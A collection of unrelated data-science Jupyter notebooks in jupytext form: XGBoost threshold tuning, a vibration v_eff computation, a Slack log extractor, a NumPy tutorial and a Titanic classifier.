# + [markdown] id="gFqK7_fVTBaw" colab_type="text"
# #### Precision-Recall Curve
# + id="g3bSC68866Zf" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 73} outputId="9586f2db-11d1-4c06-d8da-7d3a5454df4b"
#for the training
# predict class values
yhat = xgb_smooth.predict(X_train)
lr_precision, lr_recall, thresh = precision_recall_curve(y_train, y_pred_train)
lr_f1, lr_auc = f1_score(y_train, yhat), auc(lr_recall, lr_precision)
# summarize scores
print(' Training Classification: f1=%.3f auc=%.3f' % (lr_f1, lr_auc))
print('')
#for the test
# predict class values
yhat_t = xgb_smooth.predict(X_test)
lr_precision_t, lr_recall_t, thresh_t = precision_recall_curve(y_test, y_pred_test)
lr_f1_t, lr_auc_t = f1_score(y_test, yhat_t), auc(lr_recall_t, lr_precision_t)
# summarize scores
print(' Test Classification: f1=%.3f auc=%.3f' % (lr_f1_t, lr_auc_t))
# + id="29RR_Nix66YC" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 279} outputId="e3a3718f-c909-4cb1-8f72-e109ee9e2672"
#plot
fig,ax = plt.subplots()
plt.plot(lr_precision,lr_recall,label='PR (Train)')#,lw=3)
plt.plot(lr_precision_t,lr_recall_t,label='PR (Test)')#,lw=3)
#pyplot.scatter(recall[ix], precision[ix], marker='o', color='black', label='Best Training')
#pyplot.scatter(recall_test[ix_t], precision_test[ix_t], marker='o', color='red', label='Best Test')
plt.xlabel('Precision')
plt.ylabel('Recall')
plt.grid()
plt.legend()
plt.show()
# + [markdown] id="MoB-bZr3TKoM" colab_type="text"
# #### Optimal Threshold
# + id="4NWG69oT66WF" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="57018a84-7dc2-486f-fc83-6fc5dfa91a4b"
# threshold plot
plt.plot(thresh,lr_precision[:-1],'-',label='P (Train)',color='orange')#,lw=3)
plt.plot(thresh,lr_recall[:-1],'-',label='R (Train)',color='steelblue')#,lw=3)
plt.plot(thresh_t,lr_precision_t[:-1],'--',label='P (Test)',color='orange')
plt.plot(thresh_t,lr_recall_t[:-1],'--',label='R (Test)',color='steelblue')
#plt.plot([0,1],[0,1],'k-',lw=2)
plt.gca().set_xbound(lower=0,upper=1)
plt.xlabel('Threshold')
plt.ylabel('Precision/Recall')
plt.legend()
plt.show()
# + [markdown] id="P2jQzqXyTWU3" colab_type="text"
# #### Threshold Tuning for F1-Score
# + id="VNIYw-nxPdm-" colab_type="code" colab={}
# apply threshold to predictions to create labels
def to_labels(pos_preds, threshold):
'''
define a function to take the prediction and threshold as an argument and return an array of integers in {0, 1}
'''
return (pos_preds >= threshold).astype(int)
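# A quick sanity check of ```to_labels``` on hypothetical scores (the values below are made up for illustration; the function is restated so the snippet is self-contained):

```python
import numpy as np

def to_labels(pos_preds, threshold):
    # same logic as the function above: 1 where the score clears the threshold
    return (pos_preds >= threshold).astype(int)

scores = np.array([0.1, 0.4, 0.5, 0.9])
print(to_labels(scores, 0.5).tolist())  # [0, 0, 1, 1]
```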
# + id="zLJeaNtyPd0J" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 36} outputId="797dd92e-7167-4800-ff5b-41c9d66e998a"
# define thresholds (start, stop, step)
threshold = np.arange(0, 1, 0.002)
# evaluate each threshold
scores = [f1_score(y_train, to_labels(y_pred_train, t)) for t in threshold]
# get best threshold
ix = np.argmax(scores)
print('Training Threshold = %.3f, F-Score = %.5f' % (threshold[ix], scores[ix]))
# + [markdown] id="J5EU8ZgnTciA" colab_type="text"
# ## Predicting
# + [markdown] id="WdEPwWvsT7GS" colab_type="text"
# #### First on the ```train``` - 2017.
# + id="oQRYTUl-Pd-J" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 166} outputId="71926e92-5b55-492a-af1f-0f2d09e2e3f7"
print('Predicting on the Training-set with a Threshold of %.3f' % 0.700)
train['pred'] = (xgb_smooth.predict_proba(train[x_cols])[:, 1] > 0.700).astype(int)  # threshold the positive-class probability
print(' Accuracy:', accuracy_score(train['y'], train['pred']))
print("RMSE: %f" % np.sqrt(mean_squared_error(train['y'], train['pred'])))
print(' f1-score for the + class:',f1_score(train['y'],train['pred']))
print(' Precision for the + class:',precision_score(train['y'],train['pred']))
print(' Recall for the + class:',recall_score(train['y'],train['pred']))
#y_pred_train = model.predict(train[x_cols])
print(' AUC:',roc_auc_score(train['y'],train['pred']))
print(' Ave. Precision:',average_precision_score(train['y'],train['pred']))
#train.head(3)
# + id="Lx7fR3-2PeK5" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 367} outputId="b22c41ae-1a77-47b6-b2f9-b6527721f178"
cnf_matrix = confusion_matrix(train['y'], train['pred'])
plot_confusion_matrix(cnf_matrix, classes=['0', '1'],
title='Confusion matrix, without normalization')
# + id="z83cpUauPeHd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 185} outputId="92b4f065-f4e5-4130-b639-a217e82ec317"
#have a look at the built-in report
print(classification_report(train['y'], train['pred']))
# + [markdown] id="xBo7dJKETj5v" colab_type="text"
# ### Now our personal ```test``` - 4 months towards the end of 2018.
# + id="0LQutsMyPeEU" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 166} outputId="25ac8995-1bb7-4b47-9082-bc96d4704fca"
print('Predicting on the Test-set with a Threshold of %.3f' % 0.700)
test['pred'] = (xgb_smooth.predict_proba(test[x_cols])[:, 1] > 0.700).astype(int)  # threshold the positive-class probability
print(' Accuracy:', accuracy_score(test['y'], test['pred']))
print("RMSE: %f" % np.sqrt(mean_squared_error(test['y'], test['pred'])))
print (' f1-score for the + class:',f1_score(test['y'],test['pred']))
print (' Precision for the + class:',precision_score(test['y'],test['pred']))
print (' Recall for the + class:',recall_score(test['y'],test['pred']))
#y_pred_test = model.predict(test[x_cols])
print (' AUC:',roc_auc_score(test['y'],test['pred']))
print (' Ave. Precision:',average_precision_score(test['y'],test['pred']))
# + id="opfkBKfAPeCM" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 367} outputId="317b76c9-fe5d-4015-d05f-ed333891546d"
cnf_matrix = confusion_matrix(test['y'], test['pred'])
plot_confusion_matrix(cnf_matrix, classes=['0', '1'],
title='Confusion matrix, without normalization')
# + id="WJT_49VIPd7V" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 185} outputId="d18f36cd-1019-4402-bd81-ff02f71f9015"
#have a look at the built-in report
print(classification_report(test['y'], test['pred']))
# + id="tDWjtHBHPd4h" colab_type="code" colab={}
print(len(prediction))
good = prediction.loc[prediction['pred'] == 1]
print(len(good))
# + id="oXZcJFBCPdx0" colab_type="code" colab={}
good.head(2)
# + id="W1BR_YV0PdvD" colab_type="code" colab={}
#save it
good[['segment_id', 'year', 'month', 'day', 'hour', 'latitude', 'longitude']].to_csv(path/'data/03_XGBoostTuning.csv',
index=False)
| 03_PreliminaryTuning.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import pandas as pd
import time as time
import sys
# +
file = r"C:\Users\mdk\Desktop\93307\Ruwe trillingsdata\positie_1\20181001112633000195.txt"
start = time.time()
data = pd.read_csv(file, sep=' ', comment='#', header=None, names=('t', 'x', 'y', 'z'))
elapsed_time = time.time() - start
df = data.iloc[:, 1]  # x-axis velocities
# +
def progress(count, total, status=''):
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * float(count) / float(total), 2)
bar = '+' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('\r[%s] %s%s ...%s' % (bar, percents, '%', status))
sys.stdout.flush()
def compute_veff_sbr(v, T, Ts=0.125, a=8):
    """
    :param v: velocity samples (mm/s)
    :param T: sample period (s)
    :param Ts: time constant of the running RMS (s)
    :param a: every a-th sample is used
    """
    l = int(np.log2(v.size) + 1)  # next power of two
N_org = v.size
N = 2**l
t = np.linspace(0,N*T,N,endpoint=False)
v = np.pad(v,(0,N-v.size),'constant')
vibrations_fft = np.fft.fft(v)
f = np.linspace(0, 1 / T, N, endpoint=False)
f_mod=f
f_mod[f<1.0]=0.1
weight = 1 / np.sqrt(1 + (5.6 / f_mod) ** 2)
vibrations_fft_w = weight * vibrations_fft
vibrations_w = np.fft.ifft(vibrations_fft_w).real
t_sel = t[:N_org:a]
vibrations_w = vibrations_w[:N_org:a]
v_sqrd_w = vibrations_w ** 2
v_eff = np.zeros(t_sel.size)
dt = t_sel[1] - t_sel[0]
print('compute v_eff')
for i in range(t_sel.size - 1):
g_xi = np.exp(-t_sel[:i + 1][::-1] / Ts)
v_eff[i] = np.sqrt(1 / Ts * np.trapz(g_xi * v_sqrd_w[:i + 1], dx=dt))
progress(i,t_sel.size-1,"processing %s of %s" % (i + 1, t_sel.size))
idx = np.argmax(v_eff)
return v_eff[idx], t_sel, vibrations_w, v_eff
start = time.time()
compute_veff_sbr(df,T=1/400)
elapsed_time = time.time()-start
print(elapsed_time)
# -
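# As a standalone sketch (not part of the original script), the SBR frequency weighting applied inside `compute_veff_sbr` can be inspected on its own; the frequencies below are arbitrary examples:

```python
import numpy as np

f = np.array([1.0, 5.6, 56.0])             # example frequencies in Hz
weight = 1 / np.sqrt(1 + (5.6 / f) ** 2)   # same weighting as in compute_veff_sbr
print(np.round(weight, 3))                 # [0.176 0.707 0.995]
```

# At the 5.6 Hz corner frequency the weight is 1/sqrt(2); low frequencies are attenuated, high frequencies pass nearly unchanged.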
| Untitled.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import json
from os import walk
#mypath = r'C:\Users\lenovo\Documents\IEEE WebDev\IEEE SP Web Dev Slack export May 15 2017'
mypath = input("Enter file address of logs\n")
import html.parser
html_parser = html.parser.HTMLParser()
with open(mypath + '\\' + 'users.json') as data_file:
users = json.load(data_file)
names = []
for user in users:
temp = {}
temp['name'] = user['name']
temp['id'] = user['id']
names.append(temp)
print (names)
names_list = {}
for i in names:
names_list[i['id']] = i['name']
print(names_list)
with open(mypath + '\\' + 'channels.json') as data_file:
channels_json = json.load(data_file)
channels = []
for channel in channels_json:
channels.append(channel['name'])
print (channels)
final_log = []
for channel in channels:
file = open(channel + '.txt','w')
path = mypath + '\\'+ channel
f = []
for (dirpath, dirnames, filenames) in walk(path):
f.extend(filenames)
break
log = []
for session in f:
with open(path+'\\'+session) as data_file:
data = json.load(data_file)
            for mesg in data:
                # keep only plain messages; entries with a 'subtype' are system events
                if mesg['type'] == 'message' and 'subtype' not in mesg:
temp = {}
temp['name'] = names_list[mesg['user']]
temp['text'] = mesg['text']
                    temp['text'] = html.unescape(temp['text'])  # HTMLParser.unescape was removed in Python 3.9
file.write(temp['name'] + ': ')
file.write(temp['text'] + '\n')
log.append(temp)
final_log.append(log)
file.close()
print(final_log)
| Extractor.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# **Disclaimer:** Most of the content in this notebook is coming from [www.scipy-lectures.org](http://www.scipy-lectures.org/intro/index.html)
# # NumPy
#
# [NumPy](http://www.numpy.org/) is **the** fundamental package for scientific computing with Python. It is the basic building block of most data analysis in Python and contains highly optimized routines for creating and manipulating arrays.
#
# ### Everything revolves around numpy arrays
# * **`Scipy`** adds a bunch of useful science and engineering routines that operate on numpy arrays. E.g. signal processing, statistical distributions, image analysis, etc.
# * **`pandas`** adds powerful methods for manipulating numpy arrays. Like data frames in R - but typically faster.
# * **`scikit-learn`** supports state-of-the-art machine learning over numpy arrays. Inputs and outputs of virtually all functions are numpy arrays.
# * If you want many more short exercises than the ones in this notebook - you can find 100 of them [here](http://www.labri.fr/perso/nrougier/teaching/numpy.100/)
# ## NumPy arrays vs Python arrays
#
# NumPy arrays look very similar to Python lists.
import numpy as np
a = np.array([0, 1, 2, 3])
a
# **So, why is this useful?** NumPy arrays are memory-efficient containers that provide fast numerical operations. We can show this very quickly by running a simple computation on the same two arrays.
# +
L = range(1000)
# Computing the squares of the first 1000 numbers with a Python list
# %timeit [i**2 for i in L]
# +
a = np.array(L)
# Computing the squares of the first 1000 numbers with a NumPy array
# %timeit a**2
# -
# # Creating arrays
#
# ## Manual construction of arrays
#
# You can create NumPy arrays manually almost in the same way as in Python in general.
#
# ### 1-D
a = np.array([0, 1, 2, 3])
a
a.shape
# ### 2-D, 3-D, ...
b = np.array([[0, 1, 2], [3, 4, 5]]) # 2 x 3 array
b
b.shape
c = np.array([[[1], [2]], [[3], [4]]])
c
c.shape
# ## Functions for creating arrays
#
# In practice, we rarely enter items one by one. Therefore, NumPy offers many different helper functions.
#
# ### Evenly spaced
a = np.arange(10) # 0 .. n-1 (!)
a
b = np.arange(1, 9, 2) # start, end (exclusive), step
b
# ### ... or by number of points
c = np.linspace(0, 1, 6) # start, end, num-points
c
d = np.linspace(0, 1, 5, endpoint=False)
d
# ### Common arrays
a = np.ones((3, 3)) # reminder: (3, 3) is a tuple
a
b = np.zeros((2, 2))
b
c = np.eye(3)
c
d = np.diag(np.array([1, 2, 3, 4]))
d
# ### `np.random`: random numbers (Mersenne Twister PRNG)
a = np.random.rand(4) # uniform in [0, 1]
a
b = np.random.randn(4) # Gaussian
b
np.random.seed(1234) # Setting the random seed
# # Basic data types
#
# You may have noticed that, in some instances, array elements are displayed with a trailing dot (e.g. ``2.`` vs ``2``). This is due to a difference in the data-type used:
a = np.array([1, 2, 3])
a.dtype
b = np.array([1., 2., 3.])
b.dtype
# Different data-types allow us to store data more compactly in memory, but most of the time we simply work with floating point numbers. Note that, in the example above, NumPy auto-detects the data-type from the input.
#
# You can explicitly specify which data-type you want:
c = np.array([1, 2, 3], dtype=float)
c.dtype
# The **default** data type is floating point:
a = np.ones((3, 3))
a.dtype
# There are also other types:
# Complex
d = np.array([1+2j, 3+4j, 5+6*1j])
d.dtype
# Bool
e = np.array([True, False, False, True])
e.dtype
# Strings
f = np.array(['Bonjour', 'Hello', 'Hallo',])
f.dtype # <--- strings containing max. 7 letters
# And much more...
# * ``int32``
# * ``int64``
# * ``uint32``
# * ``uint64``
# # Indexing and slicing
#
# The items of an array can be accessed and assigned to the same way as other Python sequences (e.g. lists):
a = np.arange(10)
a
a[0], a[2], a[-1]
# **Warning**: Indices begin at 0, like other Python sequences (and C/C++). In contrast, in Fortran or Matlab, indices begin at 1.
# The usual python idiom for reversing a sequence is supported:
a[::-1]
# For multidimensional arrays, indexes are tuples of integers:
a = np.diag(np.arange(3))
a
a[1, 1]
a[2, 1] = 10 # third line, second column
a
a[1]
# ### Note
#
# * In 2D, the first dimension corresponds to **rows**, the second to **columns**.
# * For multidimensional ``a``, ``a[0]`` is interpreted by taking all elements in the unspecified dimensions.
# ## Slicing: Arrays, like other Python sequences can also be sliced
a = np.arange(10)
a
a[2:9:3] # [start:end:step]
# Note that the last index is not included!
a[:4]
# All three slice components are not required: by default, `start` is 0,
# `end` is the last and `step` is 1:
a[1:3]
a[::2]
a[3:]
# A small illustrated summary of NumPy indexing and slicing...
#
# <img src="http://www.scipy-lectures.org/_images/numpy_indexing.png" width=60%>
# You can also combine assignment and slicing:
a = np.arange(10)
a[5:] = 10
a
b = np.arange(5)
a[5:] = b[::-1]
a
# # Fancy indexing
#
# NumPy arrays can be indexed with slices, but also with boolean or integer arrays (**masks**). This method is called *fancy indexing*. It creates **copies not views**.
#
# ## Using boolean masks
np.random.seed(3)
a = np.random.randint(0, 21, 15)
a
(a % 3 == 0)
mask = (a % 3 == 0)
extract_from_a = a[mask] # or, a[a%3==0]
extract_from_a # extract a sub-array with the mask
# Indexing with a mask can be very useful to assign a new value to a sub-array:
a[a % 3 == 0] = -1
a
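# A small demonstration (a sketch) of the copy-vs-view distinction: modifying the result of fancy indexing leaves the original untouched, while a slice is a view into it:

```python
import numpy as np

a = np.arange(5)
b = a[[0, 1]]   # fancy indexing -> copy
b[0] = 99
print(a)        # original unchanged

c = a[:2]       # slicing -> view
c[0] = 99
print(a)        # original modified through the view
```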
# ## Indexing with an array of integers
a = np.arange(0, 100, 10)
a
# Indexing can be done with an array of integers, where the same index can be repeated several times:
a[[2, 3, 2, 4, 2]] # note: [2, 3, 2, 4, 2] is a Python list
# New values can be assigned with this kind of indexing:
a[[9, 7]] = -100
a
# The image below illustrates various fancy indexing applications:
#
# <img src="http://www.scipy-lectures.org/_images/numpy_fancy_indexing.png" width=60%>
# # Elementwise operations
#
# NumPy provides many elementwise operations that are much quicker than comparable list comprehension in plain Python.
#
# ## Basic operations
#
# With scalars:
a = np.array([1, 2, 3, 4])
a + 1
2**a
# All arithmetic operates elementwise:
b = np.ones(4) + 1
a - b
a * b
j = np.arange(5)
2**(j + 1) - j
# ### Array multiplication is not matrix multiplication
c = np.ones((3, 3))
c * c # NOT matrix multiplication!
# Matrix multiplication
c.dot(c)
# ## Other operations
#
# ### Comparisons
a = np.array([1, 2, 3, 4])
b = np.array([4, 2, 2, 4])
a == b
a > b
# Array-wise comparisons:
a = np.array([1, 2, 3, 4])
b = np.array([4, 2, 2, 4])
c = np.array([1, 2, 3, 4])
np.array_equal(a, b)
np.array_equal(a, c)
# ### Logical operations
a = np.array([1, 1, 0, 0], dtype=bool)
b = np.array([1, 0, 1, 0], dtype=bool)
np.logical_or(a, b)
np.logical_and(a, b)
# ### Transcendental functions
a = np.arange(5)
np.sin(a)
np.log(a)
np.exp(a)
# ### Shape mismatches
a = np.arange(4)
# NBVAL_SKIP
a + np.array([1, 2])
# *Broadcasting?* We'll return to that later.
# ### Transposition
a = np.triu(np.ones((3, 3)), 1)
a
a.T
# ### The transposition is a view
#
# As a result, the following code **is wrong** and will **not make a matrix symmetric**:
#
# >>> a += a.T
#
# It will work for small arrays (because of buffering) but fail for large ones, in unpredictable ways.
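# If a symmetric matrix is what's wanted, a safe pattern (a sketch, assuming that intent) is to write the sum into a new array instead of updating in place:

```python
import numpy as np

a = np.triu(np.ones((3, 3)), 1)
s = a + a.T                  # allocates a new array, so no aliasing with the transposed view
print(np.allclose(s, s.T))   # True
```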
# # Basic reductions
#
# NumPy offers many quick functions to compute things like sum, mean, max etc.
#
# ## Computing sums
x = np.array([1, 2, 3, 4])
np.sum(x)
# Note: most reductions can also be called as methods on the NumPy array itself.
x.sum()
# Sum by rows and by columns:
#
# <img src="http://www.scipy-lectures.org/_images/reductions.png" width=20%>
x = np.array([[1, 1], [2, 2]])
x
x.sum(axis=0) # columns (first dimension)
x.sum(axis=1) # rows (second dimension)
# ## Other reductions
#
# Like, `mean`, `std`, `cumsum` etc. works the same way (and take ``axis=``).
# ### Extrema
x = np.array([1, 3, 2])
x.min()
x.max()
x.argmin() # index of minimum
x.argmax() # index of maximum
# ### Logical operations
np.all([True, True, False])
np.any([True, True, False])
# Can be used for array comparisons:
a = np.zeros((100, 100))
np.any(a != 0)
np.all(a == a)
a = np.array([1, 2, 3, 2])
b = np.array([2, 2, 3, 2])
c = np.array([6, 4, 4, 5])
((a <= b) & (b <= c)).all()
# ### Statistics
x = np.array([1, 2, 3, 1])
y = np.array([[1, 2, 3], [5, 6, 1]])
x.mean()
np.median(x)
np.median(y, axis=-1) # last axis
x.std() # full population standard dev.
# ... and many more (best to learn as you go).
# # Broadcasting
#
# * Basic operations on ``numpy`` arrays (addition, etc.) are elementwise
#
# * This works on arrays of the same size. ***Nevertheless***, it's also possible to do operations on arrays of different sizes if *NumPy* can transform these arrays so that they all have the same size: this conversion is called **broadcasting**.
#
# The image below gives an example of broadcasting:
#
# <img src="http://www.scipy-lectures.org/_images/numpy_broadcasting.png" width=75%>
# Let's verify this:
a = np.tile(np.arange(0, 40, 10), (3, 1)).T
a
b = np.array([0, 1, 2])
a + b
# We have already used broadcasting without knowing it!
a = np.ones((4, 5))
a[0] = 2 # we assign an array of dimension 0 to an array of dimension 1
a
# A useful trick:
a = np.arange(0, 40, 10)
a.shape
a = a[:, np.newaxis] # adds a new axis -> 2D array
a.shape
a
a + b
# Broadcasting seems a bit magical, but it is actually quite natural to use it when we want to solve a problem whose output data is an array with more dimensions than input data.
# A lot of grid-based or network-based problems can also use broadcasting. For instance, if we want to compute the distance from the origin of points on a 5x5 grid, we can do:
x, y = np.arange(5), np.arange(5)[:, None]
distance = np.sqrt(x ** 2 + y ** 2)
distance
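# The same grid of distances can be obtained with `np.hypot`, which broadcasts its arguments in exactly the same way:

```python
import numpy as np

x, y = np.arange(5), np.arange(5)[:, None]
distance = np.hypot(x, y)    # elementwise sqrt(x**2 + y**2), broadcast to (5, 5)
print(distance.shape)        # (5, 5)
```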
# # Array shape manipulation
#
# Sometimes your arrays don't have the right shape. Also for this, NumPy has many solutions.
#
# ## Flattening
a = np.array([[1, 2, 3], [4, 5, 6]])
a
a.ravel()
a.T
a.T.ravel()
# Higher dimensions: last dimensions ravel out "first".
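# A short illustration: in C (row-major) order the last axis varies fastest, while ``order='F'`` ravels column-major instead:

```python
import numpy as np

a = np.array([[1, 2, 3], [4, 5, 6]])
print(a.ravel())             # [1 2 3 4 5 6]
print(a.ravel(order='F'))    # [1 4 2 5 3 6]
```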
# ## Reshaping
#
# The inverse operation to flattening:
a = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])
a
a.reshape(6, 2)
# Or,
a.reshape((6, -1)) # unspecified (-1) value is inferred
# ## Adding a dimension
#
# Indexing with the ``np.newaxis`` or ``None`` object allows us to add an axis to an array (you have seen this already above in the broadcasting section):
z = np.array([1, 2, 3])
z
z[:, np.newaxis]
z[np.newaxis, :]
# ## Dimension shuffling
a = np.arange(4*3*2).reshape(4, 3, 2)
a
a.shape
b = a.transpose(1, 2, 0)
b
b.shape
# ## Resizing
#
# Size of an array can be changed with ``ndarray.resize``:
a = np.arange(4)
a.resize((8,))
a
# # Sorting data
#
# Sorting along an axis:
a = np.array([[4, 3, 5], [1, 2, 1]])
b = np.sort(a, axis=1)
b
# **Important**: Note that the code above sorts each row separately!
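# Passing ``axis=0`` instead sorts each *column* independently:

```python
import numpy as np

a = np.array([[4, 3, 5], [1, 2, 1]])
print(np.sort(a, axis=0))    # each column sorted: [[1 2 1], [4 3 5]]
```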
# In-place sort:
a.sort(axis=1)
a
# Sorting with fancy indexing:
a = np.array([4, 3, 1, 2])
j = np.argsort(a)
j
a[j]
# Finding minima and maxima:
a = np.array([4, 3, 1, 2])
j_max = np.argmax(a)
j_min = np.argmin(a)
j_max, j_min
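# `argsort` combined with fancy indexing is also the usual way to reorder the rows of a 2-D array by one of its columns (a small sketch, not from the original lecture):

```python
import numpy as np

data = np.array([[3, 30],
                 [1, 10],
                 [2, 20]])
order = np.argsort(data[:, 0])   # row order implied by the first column
print(data[order])
# [[ 1 10]
#  [ 2 20]
#  [ 3 30]]
```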
# # `npy` - NumPy's own data format
#
# NumPy has its own binary format (`.npy`): not portable to other languages, but with efficient I/O:
data = np.ones((3, 3))
np.save('pop.npy', data)
data3 = np.load('pop.npy')
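# A quick round-trip check (a sketch, not from the original lecture), written to a temporary directory so no files are left behind; `np.savez` is the companion function for storing several arrays in one `.npz` archive:

```python
import os
import tempfile

import numpy as np

data = np.ones((3, 3))
with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, 'pop.npy')
    np.save(path, data)
    loaded = np.load(path)             # round trip through the .npy file

    # several arrays at once -> a .npz archive, loaded back as a dict-like object
    np.savez(os.path.join(tmp, 'arrays.npz'), a=data, b=data * 2)
    archive = np.load(os.path.join(tmp, 'arrays.npz'))
    assert np.array_equal(archive['b'], data * 2)
    archive.close()
```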
# # Summary - What do you need to know to get started?
#
# * Know how to create arrays : ``array``, ``arange``, ``ones``, ``zeros``.
# * Know the shape of the array with ``array.shape``, then use slicing to obtain different views of the array: ``array[::2]``, etc. Adjust the shape of the array using ``reshape`` or flatten it with ``ravel``.
# * Obtain a subset of the elements of an array and/or modify their values with masks
# ``a[a < 0] = 0``
# * Know miscellaneous operations on arrays, such as finding the mean or max (``array.max()``, ``array.mean()``).
# * For advanced use: master the indexing with arrays of integers, as well as broadcasting.
# source notebook: notebooks/.ipynb_checkpoints/python_numpy-checkpoint.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
df = pd.read_csv('train.csv')
df1 = pd.read_csv('test.csv')
df.head()
df1.head()
# +
dfy = df.Survived
df.drop(['PassengerId','Survived','Name','Ticket','Cabin'],axis=1,inplace=True)
df1.drop(['PassengerId','Name','Ticket','Cabin'],axis=1,inplace=True)
# -
df.head()
df1.head()
print('shape of training set : ',df.shape)
print('shape of testing set : ',df1.shape)
df.info()
df1.info()
df.describe()
df1.describe()
# +
column_df = df.columns
for x in column_df:
print('unique value information : ',x)
# print(df[x].unique())
print('number of unique value : ',df[x].unique().shape[0])
print('number of null (True if value is NaN) : \n',df[x].isnull().value_counts())
print('\n','-------------------------------------------------------------------------------','\n')
# +
column_df1 = df1.columns
for x in column_df1:
print('unique value information : ',x)
# print(df1[x].unique())
print('number of unique value : ',df1[x].unique().shape[0])
print('number of null (True if value is NaN) : \n',df1[x].isnull().value_counts())
print('\n','-------------------------------------------------------------------------------','\n')
# -
# #
#
#
#
#
# ### Replace NaN value with mean value
# #### Age in df and df1
df.Age.isnull().value_counts()
df.Age.fillna(df.Age.mean(),inplace=True)
df.Age.isnull().value_counts()
df1.Age.isnull().value_counts()
df1.Age.fillna(df1.Age.mean(),inplace=True)
df1.Age.isnull().value_counts()
# #### `Embarked` in df has 2 missing values; replace them with the mode of that column
df.Embarked.isnull().value_counts()
df.Embarked.value_counts()
df.Embarked.fillna('S',inplace=True)
df.Embarked.isnull().value_counts()
# #### `Fare` in df1 has 1 missing value; replace it with the mean of that column
df1.Fare.isnull().value_counts()
df1.Fare.fillna(df1.Fare.mean(),inplace=True)
df1.Fare.isnull().value_counts()
df.info()
df1.info()
# #### Missing value problem solved!
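# As a sketch (not part of the original notebook, with hypothetical miniature frames standing in for `df`/`df1`), scikit-learn's `SimpleImputer` gives the same fills in a reusable form, learning the statistics on the training frame only:

```python
import pandas as pd
from sklearn.impute import SimpleImputer

# hypothetical miniature frames standing in for df / df1
train = pd.DataFrame({'Age': [22.0, None, 38.0], 'Fare': [7.25, 71.28, None]})
test = pd.DataFrame({'Age': [None, 30.0], 'Fare': [8.05, None]})

imputer = SimpleImputer(strategy='mean')
train_filled = imputer.fit_transform(train)   # learns the training means
test_filled = imputer.transform(test)         # reuses them on the test set
print(test_filled[0, 0])                      # filled with the training mean age, 30.0
```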
# ### Label encoding of the categorical object-dtype columns ('Sex' and 'Embarked')
from sklearn.preprocessing import LabelEncoder
# +
le = LabelEncoder()
le.fit(df.Sex)
Sex_labeled = le.transform(df.Sex)
df['Sex_labeled'] = Sex_labeled
df.drop(['Sex'],axis=1,inplace=True)
le.fit(df1.Sex)
Sex_labeled = le.transform(df1.Sex)
df1['Sex_labeled'] = Sex_labeled
df1.drop(['Sex'],axis=1,inplace=True)
le.fit(df.Embarked)
Embarked_labeled = le.transform(df.Embarked)
df['Embarked_labeled'] = Embarked_labeled
df.drop(['Embarked'],axis=1,inplace=True)
le.fit(df1.Embarked)
Embarked_labeled = le.transform(df1.Embarked)
df1['Embarked_labeled'] = Embarked_labeled
df1.drop(['Embarked'],axis=1,inplace=True)
# -
df.head()
df1.head()
df.info()
df1.info()
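# Note that the cells above refit the `LabelEncoder` on the test frame; a safer pattern (sketched here with hypothetical data) is to fit once on the training column and reuse the fitted encoder, so both frames share one label-to-integer mapping:

```python
from sklearn.preprocessing import LabelEncoder

# hypothetical stand-ins for the 'Sex' columns of df and df1
train_sex = ['male', 'female', 'female', 'male']
test_sex = ['female', 'male']

le = LabelEncoder()
le.fit(train_sex)                    # learn the mapping once, on training data
print(list(le.transform(test_sex)))  # [0, 1] -- identical mapping for the test set
```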
# #
#
#
#
# ## Train test split of df
from sklearn.model_selection import train_test_split as tts
x_train, x_test, y_train, y_test = tts(df,dfy,test_size = 0.25)
print('shape of train and test set : ')
print('x_train : ',x_train.shape)
print('x_test : ',x_test.shape)
print('y_train : ',y_train.shape)
print('y_test : ',y_test.shape)
# #
#
#
#
# ## Random Forest model
from sklearn.ensemble import RandomForestClassifier as RFC
from sklearn.metrics import roc_auc_score
model_rfc = RFC(max_depth=20,n_estimators=100,random_state=42)
model_rfc.fit(df,dfy)
model_rfc.score(df,dfy)
# +
y_pred = model_rfc.predict(df1)
#roc_auc_score(y_test,y_pred)
# -
# #
#
#
#
# ## SVM classifier
# +
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
scaler.fit(df)  # fit the scaler on the training features only
df = scaler.transform(df)
x_test = scaler.transform(x_test)  # reuse the training statistics
df1 = scaler.transform(df1)
# -
from sklearn.svm import SVC
model_svm = SVC(C=10)
model_svm.fit(df,dfy)
model_svm.score(df,dfy)
# +
y_pred = model_svm.predict(df1)
#roc_auc_score(y_test,y_pred)
# -
# #
#
#
#
# ## Create submission file
Survived = y_pred
PassengerId = np.arange(892,1310)
ans = pd.DataFrame(list(zip(PassengerId,Survived)),columns=['PassengerId','Survived'])
ans.head()
ans.to_csv('ans.csv',index=False)
# source notebook: Titanic machine learning problem.ipynb
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 0.6.2 Experimental
# language: julia
# name: julia-0.6-experimental
# ---
